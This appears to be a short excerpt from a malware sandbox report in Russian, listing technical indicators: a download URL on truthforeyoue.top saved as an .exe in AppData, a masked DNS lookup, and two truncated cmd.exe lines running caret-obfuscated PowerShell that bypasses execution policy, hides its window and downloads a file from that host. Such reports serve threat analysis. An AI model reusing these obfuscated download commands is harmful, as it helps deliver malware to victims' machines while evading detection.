Техническая информация
- http://truthforeyoue.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^weRS^heLL.e^X^e -EXec^Uti^onP^Ol^ic^Y ^B^y^P^A^s^S -^N^o^Pr^Of^iLE^ -winDo^W^st^yLE hId^de^N (NE^w-oB^j^eC^t ^sY^s^Te^M^.n^eT^.^We^Bcl^I^en^t).^DOW^nlOADFIle(^'http://truthfore...
- DNS ASK tr####oreyoue.top
- '<SYSTEM32>\cmd.exe' /c "Po^weRS^heLL.e^X^e -EXec^Uti^onP^Ol^ic^Y ^B^y^P^A^s^S -^N^o^Pr^Of^iLE^ -winDo^W^st^yLE hId^de^N (NE^w-oB^j^eC^t ^sY^s^Te^M^.n^eT^.^We^Bcl^I^en^t).^DOW^nlOADFIle(^'http://truthfore...' (со скрытым окном)